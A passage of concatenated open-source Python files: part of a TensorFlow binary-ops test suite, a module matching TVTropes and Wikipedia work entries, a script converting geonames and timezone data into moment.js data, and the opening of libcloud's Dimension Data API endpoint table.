],
dtype=dtype),
np.array([[2, 2], [0, 0]], dtype=np.int32),
expected=np.array(
[
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[[1, 2, 3], [4, 5, 6]],
[[7, 8, 9], [10, 11, 12]],
], dtype=dtype),
np.array([[0, 0], [1, 1], [1, 1]], dtype=np.int32),
expected=np.array(
[
[
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
],
[
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
]
],
dtype=dtype))
def testReshape(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.reshape,
np.array([], dtype=dtype),
np.array([0, 4], dtype=np.int32),
expected=np.zeros(shape=[0, 4], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array([[0, 1], [2, 3], [4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 6], dtype=np.int32),
expected=np.array([[0, 1, 2, 3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([6, -1], dtype=np.int32),
expected=np.array([[0], [1], [2], [3], [4], [5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, -1], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
def testSplit(self):
for dtype in self.numeric_types:
for axis in [0, -3]:
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=3, axis=x),
np.int32(axis),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1], [2]]], dtype=dtype),
np.array([[[3], [4]]], dtype=dtype),
np.array([[[5], [6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
for axis in [1, -2]:
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=2, axis=x),
np.int32(axis),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1]], [[3]], [[5]]], dtype=dtype),
np.array([[[2]], [[4]], [[6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
def splitvOp(x, y): # pylint: disable=invalid-name
return array_ops.split(value=y, num_or_size_splits=[2, 3], axis=x)
for axis in [1, -1]:
self._testBinary(
splitvOp,
np.int32(axis),
np.array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]],
dtype=dtype),
expected=[
np.array([[0, 1], [5, 6]], dtype=dtype),
np.array([[2, 3, 4], [7, 8, 9]], dtype=dtype),
],
equality_test=self.ListsAreClose)
def testTile(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.tile,
np.array([[6], [3], [4]], dtype=dtype),
np.array([2, 0], dtype=np.int32),
expected=np.empty([6, 0], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[6, 3, 4]], dtype=dtype),
np.array([2, 0], dtype=np.int32),
expected=np.empty([2, 0], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[6]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[6, 6]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1], [2]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[1, 1], [2, 2]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array(
[[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2]], dtype=dtype),
np.array([3, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[1, 2],
[1, 2]],
dtype=dtype))
def testTranspose(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.transpose,
np.zeros(shape=[1, 0, 4], dtype=dtype),
np.array([1, 2, 0], dtype=np.int32),
expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([0, 1], dtype=np.int32),
expected=np.array([[1, 2], [3, 4]], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 0], dtype=np.int32),
expected=np.array([[1, 3], [2, 4]], dtype=dtype))
def testConjugateTranspose(self):
for dtype in self.complex_types:
self._testBinary(
array_ops.conjugate_transpose,
np.zeros(shape=[1, 0, 4], dtype=dtype),
np.array([1, 2, 0], dtype=np.int32),
expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
self._testBinary(
array_ops.conjugate_transpose,
np.array([[1 - 1j, 2 + 2j], [3 - 3j, 4 + 4j]], dtype=dtype),
np.array([0, 1], dtype=np.int32),
expected=np.array([[1 + 1j, 2 - 2j], [3 + 3j, 4 - 4j]], dtype=dtype))
self._testBinary(
array_ops.conjugate_transpose,
np.array([[1 - 1j, 2 + 2j], [3 - 3j, 4 + 4j]], dtype=dtype),
np.array([1, 0], dtype=np.int32),
expected=np.array([[1 + 1j, 3 + 3j], [2 - 2j, 4 - 4j]], dtype=dtype))
def testCross(self):
for dtype in self.float_types:
self._testBinary(
gen_math_ops.cross,
np.zeros((4, 3), dtype=dtype),
np.zeros((4, 3), dtype=dtype),
expected=np.zeros((4, 3), dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([1, 2, 3], dtype=dtype),
np.array([4, 5, 6], dtype=dtype),
expected=np.array([-3, 6, -3], dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([[1, 2, 3], [10, 11, 12]], dtype=dtype),
np.array([[4, 5, 6], [40, 50, 60]], dtype=dtype),
expected=np.array([[-3, 6, -3], [60, -120, 60]], dtype=dtype))
def testBroadcastArgs(self):
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([2, 3, 5], dtype=np.int32),
np.array([1], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([1], dtype=np.int32),
np.array([2, 3, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([2, 3, 5], dtype=np.int32),
np.array([5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([5], dtype=np.int32),
np.array([2, 3, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([2, 3, 5], dtype=np.int32),
np.array([3, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([3, 5], dtype=np.int32),
np.array([2, 3, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([2, 3, 5], dtype=np.int32),
np.array([3, 1], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([3, 1], dtype=np.int32),
np.array([2, 3, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([2, 1, 5], dtype=np.int32),
np.array([3, 1], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([3, 1], dtype=np.int32),
np.array([2, 1, 5], dtype=np.int32),
expected=np.array([2, 3, 5], dtype=np.int32))
with self.assertRaisesWithPredicateMatch(errors.InvalidArgumentError,
"Incompatible shapes"):
self._testBinary(array_ops.broadcast_dynamic_shape,
np.array([1, 2, 3], dtype=np.int32),
np.array([4, 5, 6], dtype=np.int32),
expected=None)
def testMatrixSetDiag(self):
for dtype in self.numeric_types:
# Square
self._testBinary(
array_ops.matrix_set_diag,
np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 1.0], [1.0, 1.0, 1.0]],
dtype=dtype),
np.array([1.0, 2.0, 3.0], dtype=dtype),
expected=np.array([[1.0, 1.0, 0.0], [1.0, 2.0, 1.0], [1.0, 1.0, 3.0]],
dtype=dtype))
self._testBinary(
array_ops.matrix_set_diag,
np.array([[[1.0, 0.0, 3.0], [0.0, 2.0, 0.0], [1.0, 0.0, 3.0]],
[[4.0, 0.0, 4.0], [0.0, 5.0, 0.0], [2.0, 0.0, 6.0]]],
dtype=dtype),
np.array([[-1.0, 0.0, -3.0], [-4.0, -5.0, -6.0]], dtype=dtype),
expected=np.array(
[[[-1.0, 0.0, 3.0], [0.0, 0.0, 0.0], [1.0, 0.0, -3.0]],
[[-4.0, 0.0, 4.0], [0.0, -5.0, 0.0], [2.0, 0.0, -6.0]]],
dtype=dtype))
# Rectangular
self._testBinary(
array_ops.matrix_set_diag,
np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 1.0]], dtype=dtype),
np.array([3.0, 4.0], dtype=dtype),
expected=np.array([[3.0, 1.0, 0.0], [1.0, 4.0, 1.0]], dtype=dtype))
self._testBinary(
array_ops.matrix_set_diag,
np.array([[0.0, 1.0], [1.0, 0.0], [1.0, 1.0]], dtype=dtype),
np.array([3.0, 4.0], dtype=dtype),
expected=np.array([[3.0, 1.0], [1.0, 4.0], [1.0, 1.0]], dtype=dtype))
self._testBinary(
array_ops.matrix_set_diag,
np.array([[[1.0, 0.0, 3.0], [0.0, 2.0, 0.0]],
[[4.0, 0.0, 4.0], [0.0, 5.0, 0.0]]], dtype=dtype),
np.array([[-1.0, -2.0], [-4.0, -5.0]],
dtype=dtype),
expected=np.array([[[-1.0, 0.0, 3.0], [0.0, -2.0, 0.0]],
[[-4.0, 0.0, 4.0], [0.0, -5.0, 0.0]]],
dtype=dtype))
def testBroadcastTo(self):
for dtype in self.all_types:
x = np.random.randint(0, high=100, size=[2, 3])
self._testBinary(
array_ops.broadcast_to,
x,
np.array([2, 3], dtype=np.int32),
expected=x)
self._testBinary(
array_ops.broadcast_to,
x,
np.array([6, 6], dtype=np.int32),
expected=np.tile(x, [3, 2]))
self._testBinary(
array_ops.broadcast_to,
x,
np.array([7, 4, 3], dtype=np.int32),
expected=np.tile(x, [7, 2, 1]))
self._testBinary(
array_ops.broadcast_to,
x,
np.array([7, 0, 3], dtype=np.int32),
expected=np.zeros([7, 0, 3], dtype=dtype))
self._testBinary(
array_ops.broadcast_to,
x,
np.array([7, 1, 2, 9], dtype=np.int32),
expected=np.tile(x, [7, 1, 1, 3]))
self._testBinary(
array_ops.broadcast_to,
np.zeros([2, 0], dtype=dtype),
np.array([4, 0], dtype=np.int32),
expected=np.zeros([4, 0], dtype=dtype))
if __name__ == "__main__":
googletest.main()
| |
""":mod:`cliche.services.align` --- String matching to align
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import difflib
from urllib.parse import unquote_plus
from sqlalchemy import ForeignKeyConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.sql import func
from sqlalchemy.types import Integer, String
from ..name import Name
from ..orm import Base
from ..sqltypes import HashableLocale as Locale
from ..web.app import app
from ..web.db import session
from ..work import Work
from .tvtropes.entities import ClicheTvtropesEdge, Entity as Tvtropes
from .wikipedia.work import ClicheWikipediaEdge, Entity as Wikipedia
class ExternalId(Base):
"""Relationship between two kinds of external works
This class can be replaced based on the probability of equality."""
#: (:class:`int`) The primary key integer.
id = Column(Integer, primary_key=True)
#: (:class:`int`) foreignkey for works.id
work_id = Column(Integer, ForeignKey('works.id'), nullable=False)
#: (:class:`collections.abc.MutableSet`) The set of
#: :class:`cliche.work.Entity`.
work = relationship(lambda: Work)
#: (:class:`str`) The namespace of the trope,
#: both namespace and name determines one trope.
tvtropes_namespace = Column(String)
#: (:class:`str`) The name of the trope.
tvtropes_name = Column(String)
#: (:class:`collections.abc.MutableSet`) The set of
#: :class:`cliche.services.tvtropes.entities.Entity`.
tvtropes = relationship('cliche.services.tvtropes.entities.Entity')
#: (:class:`str`) The namespace of the trope.
wikipedia_id = Column(String, ForeignKey('wikipedia_entities.name'))
#: (:class:`collections.abc.MutableSet`) The set of
#: :class:`cliche.services.wikipedia.work.Entity`.
wikipedia = relationship('cliche.services.wikipedia.work.Entity')
__tablename__ = 'external_ids'
__table_args__ = (
ForeignKeyConstraint(
[tvtropes_namespace, tvtropes_name],
[Tvtropes.namespace, Tvtropes.name]
),
)
def normalize(name):
return name.strip().lower()
def url_to_label(url):
if url:
label = unquote_plus(url[28:].replace('_', ' ')).strip().lower()
return label.split('(')[0]
else:
return None
def is_same(a_, b_):
diff = difflib.SequenceMatcher(None, a_, b_).ratio()
if diff > 0.9:
return True
else:
return False
def alignment():
with app.app_context():
tvtropes_list = session \
.query(Tvtropes.name, Tvtropes.namespace) \
.order_by(Tvtropes.name).all()
wikipedia_list = session \
.query(Wikipedia.name, Wikipedia.label, Wikipedia.type) \
.order_by(Wikipedia.name).all()
wikipedia_list = [(url_to_label(x[0]), x[0], x[2]) for x in wikipedia_list]
tvtropes_list = [(normalize(x[0]), x[0], x[1]) for x in tvtropes_list]
wikipedia_list.sort()
tvtropes_list.sort()
tv_iter = iter(tvtropes_list)
wiki_iter = iter(wikipedia_list)
trope = next(tv_iter)
wiki = next(wiki_iter)
while(True):
try:
if is_same(trope[0], wiki[0]):
print(trope[0], wiki[0])
with app.app_context():
work = Work(media_type=wiki[2])
work.names.update({
Name(nameable=work,
name=trope[0],
locale=Locale.parse('en_US'))
})
external_id = ExternalId(
work_id=work.id,
work=work,
wikipedia_id=wiki[1],
wikipedia=session
.query(Wikipedia)
.filter(Wikipedia.name.like(wiki[1]))
.first(),
tvtropes_name=trope[1],
tvtropes_namespace=trope[2],
tvtropes=session
.query(Tvtropes)
.filter(
Tvtropes.name.like(trope[1]),
Tvtropes.namespace.like(trope[2]))
.first()
)
with session.begin():
session.add_all([work, external_id])
else:
with app.app_context():
wikipedia_work = Work(media_type=wiki[2])
wikipedia_work.names.update({
Name(nameable=wikipedia_work,
name=wiki[0],
locale=Locale.parse('en_US'))
})
wikipedia_edge = ClicheWikipediaEdge(
cliche_work=wikipedia_work,
wikipedia_name=wiki[1],
wikipedia_work=session.query(Wikipedia).
filter_by(name=wiki[1]).first()
)
tvtropes_work = Work(media_type='work')
tvtropes_work.names.update({
Name(nameable=tvtropes_work,
name=trope[0],
locale=Locale.parse('en_US'))
})
tvtropes_edge = ClicheTvtropesEdge(
cliche_work=tvtropes_work,
tvtropes_namespace=trope[2],
tvtropes_name=trope[1],
tvtropes_entity=session.query(Tvtropes).
filter_by(name=trope[1], namespace=trope[2]).first()
)
with session.begin():
session.add_all([wikipedia_work, tvtropes_work,
wikipedia_edge, tvtropes_edge])
if trope[0] > wiki[0]:
wiki = next(wiki_iter)
else:
trope = next(tv_iter)
except StopIteration:
break
def matching_from_cliche_tvtropes_edges():
# assume there are a few cliche-tvtropes edges
with app.app_context():
with session.begin():
session.query(ClicheTvtropesEdge).update({'available': True})
while True:
max_conf = session \
.query(func.max(ClicheTvtropesEdge.confidence)) \
.filter_by(available=True) \
.scalar()
if not max_conf:
break
matching = session \
.query(ClicheTvtropesEdge) \
.filter_by(confidence=max_conf, available=True) \
.first()
cliche_work = matching.cliche_work
tvtropes_entity = matching.tvtropes_entity
session.query(ClicheTvtropesEdge) \
.filter_by(cliche_work=cliche_work,
available=True) \
.update({'available': False})
session.query(ClicheTvtropesEdge) \
.filter_by(tvtropes_entity=tvtropes_entity,
available=True) \
.update({'available': False})
yield matching
def matching_from_cliche_wikipedia_edges():
# assume there are a few cliche-wikipedia edges
with app.app_context():
with session.begin():
session.query(ClicheWikipediaEdge).update({'available': True})
while True:
max_conf = session \
.query(func.max(ClicheWikipediaEdge.confidence)) \
.filter_by(available=True) \
.scalar()
if not max_conf:
break
matching = session \
.query(ClicheWikipediaEdge) \
.filter_by(confidence=max_conf, available=True) \
.first()
cliche_work = matching.cliche_work
wikipedia_work = matching.wikipedia_work
session.query(ClicheWikipediaEdge) \
.filter_by(cliche_work=cliche_work,
available=True) \
.update({'available': False})
session.query(ClicheWikipediaEdge) \
.filter_by(wikipedia_work=wikipedia_work,
available=True) \
.update({'available': False})
yield matching
| |
import os
import re
import math
import json
from itertools import chain
from xml.etree import cElementTree as et
os.chdir(os.path.abspath(os.path.dirname(__file__)))
def convert_countries():
countries = {}
with open('raw/countryInfo.txt', 'rb') as f:
for line in f:
line = line.decode('utf-8').strip().split('\t')
if not line or line[0][:1] == '#':
continue
country_code = line[0]
country = line[4]
capital = line[5]
countries[country_code] = {
'name': country,
'capital': capital,
'code': country_code
}
return countries
def convert_cities():
cities = {}
with open('raw/cities15000.txt', 'rb') as f:
for line in f:
line = line.decode('utf-8').strip().split('\t')
if not line:
continue
main_name = line[2]
country = line[8]
state = country == 'US' and line[10] or None
population = int(line[14])
timezone = line[17]
is_capital = line[7] == 'PPLC'
city_key = ('%s/%s%s' % (country, main_name,
state and '/' + state or '')).replace(' ', '_')
old_city = cities.get(city_key)
# There was already a city with that name, let the one
# with the higher population win.
if old_city is not None:
if population < old_city['population']:
continue
cities[city_key] = {
'country': country,
'state': state,
'name': main_name,
'timezone': timezone,
'population': population,
'is_capital': is_capital,
}
return cities
def find_windows_zones():
tree = et.parse('windows_zones.xml')
rv = {}
for map_zone in tree.findall(
'.//windowsZones/mapTimezones/mapZone'):
if map_zone.attrib.get('territory') == '001':
rv[map_zone.attrib['other']] = map_zone.attrib['type'].split(None)[0]
return rv
def find_weekend_info():
day_to_int = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'].index
tree = et.parse('supplemental_data.xml')
rv = {'start': {}, 'end': {}}
for info in tree.findall('.//weekendStart'):
for t in info.attrib['territories'].split():
rv['start'][t] = day_to_int(info.attrib['day'])
for info in tree.findall('.//weekendEnd'):
for t in info.attrib['territories'].split():
rv['end'][t] = day_to_int(info.attrib['day'])
return rv
def combine_data(countries, cities, timezone_data, windows_zones, weekends):
selectables = []
timezones_found = set()
timezone_mapping = {}
for tzinfo in timezone_data['zones']:
tz = tzinfo.split('|')[0]
if tz not in timezone_mapping:
timezone_mapping[tz] = len(timezone_mapping)
for tzlink in timezone_data['links']:
target, tz = tzlink.split('|')
timezone_mapping[tz] = timezone_mapping[target]
reverse_timezone_mapping = dict((v, k) for k, v in
timezone_mapping.iteritems())
def get_tz_tokens(tz):
# super shitty way to guess the timezone abbreviations. Totally
# does not work for many of them.
rv = ''
if tz in timezone_data['links']:
tz = timezone_data['links'][tz]
zone = timezone_data['zones'][timezone_mapping[tz]].split('|')
for abbr in zone[1].split(None):
rv += ' ' + abbr
rv = rv.replace('/', ' ')
# reject obvious wrong ones. obviously the above code can
# generate invalid abbreviations.
return [x for x in set(rv.lower().split()) if len(x) > 2]
def record_selectable(key, name, full_name, tz,
country=None, common_tz=False, sortinfo=None):
tokens = set(re.sub('[^\s\w]', '', full_name.lower()).split())
tokens.update(get_tz_tokens(tz))
rv = {
'k': key,
'd': full_name,
'z': timezone_mapping[tz],
'T': ' '.join(sorted(tokens)),
'sortinfo': sortinfo or {},
}
if name != full_name:
rv['n'] = name
if country is not None:
rv['c'] = country
if common_tz:
rv['C'] = 1
selectables.append(rv)
for city in cities.itervalues():
key = \
city['country'].lower() + ':' + \
(city['name'] + ':' + (city['state'] or '')).rstrip(':').lower() \
.replace(' ', '-') \
.replace('_', '-') \
.replace('\'', '') \
.replace(',', '') \
.replace('(', '') \
.replace(')', '')
display_parts = [countries[city['country']]['name']]
if city['state']:
display_parts.append(city['state'])
display_parts.append(city['name'])
record_selectable(key, city['name'], ', '.join(display_parts),
city['timezone'], city['country'],
sortinfo={'city': city})
timezones_found.add(city['timezone'])
for name in timezone_mapping:
if name in timezones_found or \
not (name.lower().startswith('etc/') or not '/' in name):
continue
key = name.lower() \
.replace('_', '-') \
.replace('/', ':') \
.replace(',', '') \
.replace('\'', '')
record_selectable(key, name.split('/', 1)[-1], name, name)
for name, tzname in windows_zones.iteritems():
key = '-'.join(name.lower().split(None)) \
.replace('(', '') \
.replace(')', '') \
.replace(',', '')
record_selectable(key, name, name, tzname, common_tz=True)
def _sort_key(x):
words = x['d'].split()
if len(words) == 1:
canonical_abbr = words[0].lower()
else:
canonical_abbr = ''.join(x[:1] for x in words).lower()
canonical = canonical_abbr in x['T'].split()
city = x['sortinfo'].get('city')
name = x['d'].lower()
importance = 0
if x.get('C'):
importance += 5
if city:
if city['is_capital']:
importance += 1
importance += math.log(max(city['population'], 1)) / 50.0
return not canonical, -importance, name
selectables.sort(key=_sort_key)
for selectable in selectables:
selectable.pop('sortinfo', None)
return {
'tzmap': reverse_timezone_mapping,
'timezones': timezone_data['zones'],
'timezone_links': timezone_data['links'],
'selectables': selectables,
'weekends': weekends,
'countries': dict((k, v['name']) for k, v in countries.iteritems()),
}
def write_combined_data(data, f):
f.write('moment.tz.add(%s);\n' %
json.dumps(data['timezones']))
f.write('moment.tz.link(%s);\n' %
json.dumps(data['timezone_links']))
f.write('timesched.setTimezoneData(%s);\n' % json.dumps({
'tzmap': data['tzmap'],
'selectables': data['selectables'],
'weekends': data['weekends'],
}))
def main():
countries = convert_countries()
cities = convert_cities()
windows_zones = find_windows_zones()
weekends = find_weekend_info()
with open('timezones.json') as f:
timezones = json.load(f)
combined = combine_data(countries, cities, timezones, windows_zones,
weekends)
with open('../lib/generated/data.js', 'w') as f:
write_combined_data(combined, f)
if __name__ == '__main__':
main()
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Dimension Data Common Components
"""
from base64 import b64encode
from time import sleep
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import ConnectionUserAndKey, XmlResponse
from libcloud.common.types import LibcloudError, InvalidCredsError
from libcloud.compute.base import Node
from libcloud.utils.py3 import basestring
from libcloud.utils.xml import findtext
# Roadmap / TODO:
#
# 1.0 - Copied from OpSource API, named provider details.
# setup a few variables to represent all of the DimensionData cloud namespaces
NAMESPACE_BASE = "http://oec.api.opsource.net/schemas"
ORGANIZATION_NS = NAMESPACE_BASE + "/organization"
SERVER_NS = NAMESPACE_BASE + "/server"
NETWORK_NS = NAMESPACE_BASE + "/network"
DIRECTORY_NS = NAMESPACE_BASE + "/directory"
GENERAL_NS = NAMESPACE_BASE + "/general"
BACKUP_NS = NAMESPACE_BASE + "/backup"
# API 2.0 Namespaces and URNs
TYPES_URN = "urn:didata.com:api:cloud:types"
# API end-points
API_ENDPOINTS = {
'dd-na': {
'name': 'North America (NA)',
'host': 'api-na.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-eu': {
'name': 'Europe (EU)',
'host': 'api-eu.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-au': {
'name': 'Australia (AU)',
'host': 'api-au.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-au-gov': {
'name': 'Australia Canberra ACT (AU)',
'host': 'api-canberra.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-af': {
'name': 'Africa (AF)',
'host': 'api-mea.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-ap': {
'name': 'Asia Pacific (AP)',
'host': 'api-ap.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-latam': {
'name': 'South America (LATAM)',
'host': 'api-latam.dimensiondata.com',
'vendor': 'DimensionData'
},
'dd-canada': {
'name': 'Canada (CA)',
'host': 'api-canada.dimensiondata.com',
'vendor': 'DimensionData'
},
'is-na': {
'name': 'North America (NA)',
'host': 'usapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-eu': {
'name': 'Europe (EU)',
'host': 'euapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-au': {
'name': 'Australia (AU)',
'host': 'auapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-af': {
'name': 'Africa (AF)',
'host': 'meaapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-ap': {
'name': 'Asia Pacific (AP)',
'host': 'apapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-latam': {
'name': 'South America (LATAM)',
'host': 'latamapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'is-canada': {
'name': 'Canada (CA)',
'host': 'canadaapi.cloud.is.co.za',
'vendor': 'InternetSolutions'
},
'ntta-na': {
'name': 'North America (NA)',
'host': 'cloudapi.nttamerica.com',
'vendor': 'NTTNorthAmerica'
},
'ntta-eu': {
'name': 'Europe (EU)',
'host': 'eucloudapi.nttamerica.com',
'vendor': 'NTTNorthAmerica'
},
'ntta-au': {
'name': 'Australia (AU)',
'host': 'aucloudapi.nttamerica.com',
'vendor': 'NTTNorthAmerica'
},
'ntta-af': {
'name': 'Africa (AF)',
'host': 'sacloudapi.nttamerica.com',
'vendor': 'NTTNorthAmerica'
},
'ntta-ap': {
'name': 'Asia Pacific (AP)',
'host': 'hkcloudapi.nttamerica.com',
'vendor': 'NTTNorthAmerica'
},
'cisco-na': {
'name': 'North America (NA)',
'host': 'iaas-api-na.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-eu': {
'name': 'Europe (EU)',
'host': 'iaas-api-eu.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-au': {
'name': 'Australia (AU)',
'host': 'iaas-api-au.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-af': {
'name': 'Africa (AF)',
'host': 'iaas-api-mea.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-ap': {
'name': 'Asia Pacific (AP)',
'host': 'iaas-api-ap.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-latam': {
'name': 'South America (LATAM)',
'host': 'iaas-api-sa.cisco-ccs.com',
'vendor': 'Cisco'
},
'cisco-canada': {
'name': 'Canada (CA)',
'host': 'iaas-api-ca.cisco-ccs.com',
'vendor': 'Cisco'
},
'med1-il': {
'name': 'Israel (IL)',
'host': 'api.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-na': {
'name': 'North America (NA)',
'host': 'api-na.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-eu': {
'name': 'Europe (EU)',
'host': 'api-eu.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-au': {
'name': 'Australia (AU)',
'host': 'api-au.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-af': {
'name': 'Africa (AF)',
'host': 'api-af.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-ap': {
'name': 'Asia Pacific (AP)',
'host': 'api-ap.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-latam': {
'name': 'South America (LATAM)',
'host': 'api-sa.cloud.med-1.com',
'vendor': 'Med-1'
},
'med1-canada': {
'name': 'Canada (CA)',
'host': 'api-ca.cloud.med-1.com',
'vendor': 'Med-1'
},
'indosat-id': {
'name': 'Indonesia (ID)',
'host': 'iaas-api.indosat.com',
'vendor': 'Indosat'
},
'indosat-na': {
'name': 'North America (NA)',
'host': 'iaas-usapi.indosat.com',
'vendor': 'Indosat'
},
'indosat-eu': {
'name': 'Europe (EU)',
'host': 'iaas-euapi.indosat.com',
'vendor': 'Indosat'
},
'indosat-au': {
'name': 'Australia (AU)',
'host': 'iaas-auapi.indosat.com',
'vendor': 'Indosat'
},
'indosat-af': {
'name': 'Africa (AF)',
'host': 'iaas-afapi.indosat.com',
'vendor': 'Indosat'
},
'bsnl-in': {
'name': 'India (IN)',
'host': 'api.bsnlcloud.com',
'vendor': 'BSNL'
},
'bsnl-na': {
'name': 'North America (NA)',
'host': 'usapi.bsnlcloud.com',
'vendor': 'BSNL'
},
'bsnl-eu': {
'name': 'Europe (EU)',
'host': 'euapi.bsnlcloud.com',
'vendor': 'BSNL'
},
'bsnl-au': {
'name': 'Australia (AU)',
'host': 'auapi.bsnlcloud.com',
'vendor': 'BSNL'
},
'bsnl-af': {
'name': 'Africa (AF)',
'host': 'afapi.bsnlcloud.com',
'vendor': 'BSNL'
},
}
# Default API end-point for the base connection class.
DEFAULT_REGION = 'dd-na'
BAD_CODE_XML_ELEMENTS = (
('responseCode', SERVER_NS),
